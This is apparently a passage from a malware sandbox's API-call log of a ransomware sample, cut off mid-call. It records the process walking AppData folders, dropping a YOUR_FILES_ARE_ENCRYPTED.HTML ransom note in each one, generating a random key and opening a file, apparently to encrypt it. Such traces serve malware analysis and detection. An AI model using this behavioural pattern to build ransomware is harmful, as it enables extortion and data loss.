lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.329] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0165.329] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 69 [0165.329] GetProcessHeap () returned 0x270000 [0165.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.331] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0165.331] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0165.331] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.331] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.331] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pbk", cAlternateFileName="")) returned 1 [0165.331] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 73 [0165.332] GetProcessHeap () returned 0x270000 [0165.332] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.332] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0165.332] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0165.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.333] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.333] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0165.333] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 84 [0165.333] GetProcessHeap () returned 0x270000 [0165.333] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.336] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0165.336] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0165.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f32c0 [0165.336] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.336] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0165.336] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 97 [0165.336] lstrcmpW (lpString1="rasphone.pbk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.337] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0165.337] lstrlenW (lpString=".pbk") returned 4 [0165.337] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0165.337] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0165.337] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0165.337] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0165.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0165.338] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0165.340] CloseHandle (hObject=0x58c) returned 1 [0165.341] GetProcessHeap () returned 0x270000 [0165.342] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.342] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0165.342] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.342] wnsprintfW (in: pszDest=0x74d2010, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0165.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.343] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.345] CloseHandle (hObject=0x5b8) returned 1 [0165.345] GetProcessHeap () returned 0x270000 [0165.346] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.346] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pbk", cAlternateFileName="")) returned 0 [0165.346] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.346] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0165.346] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.347] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.349] CloseHandle (hObject=0x304) returned 1 [0165.349] GetProcessHeap () returned 0x270000 [0165.350] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.354] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0165.354] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.354] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0165.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.355] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.357] CloseHandle (hObject=0x5e4) returned 1 [0165.357] GetProcessHeap () returned 0x270000 [0165.358] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.359] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1c7f460, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0165.359] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office") returned 56 [0165.359] GetProcessHeap () returned 0x270000 [0165.359] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.359] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office" [0165.359] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\*" [0165.359] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1c7f460, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.362] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1c7f460, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.362] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1f9be0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1f9be0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0165.362] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 68 [0165.362] lstrcmpW (lpString1="MSO1033.acl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.362] PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0165.362] lstrlenW (lpString=".acl") returned 4 [0165.362] 
PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0165.362] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 1 [0165.362] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 63 [0165.362] GetProcessHeap () returned 0x270000 [0165.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.364] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0165.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0165.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.365] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.365] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1d63ca0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 1 [0165.365] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 73 [0165.365] lstrcmpW (lpString1="index.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.365] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0165.365] lstrlenW (lpString=".dat") returned 4 [0165.365] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0165.365] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0165.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 
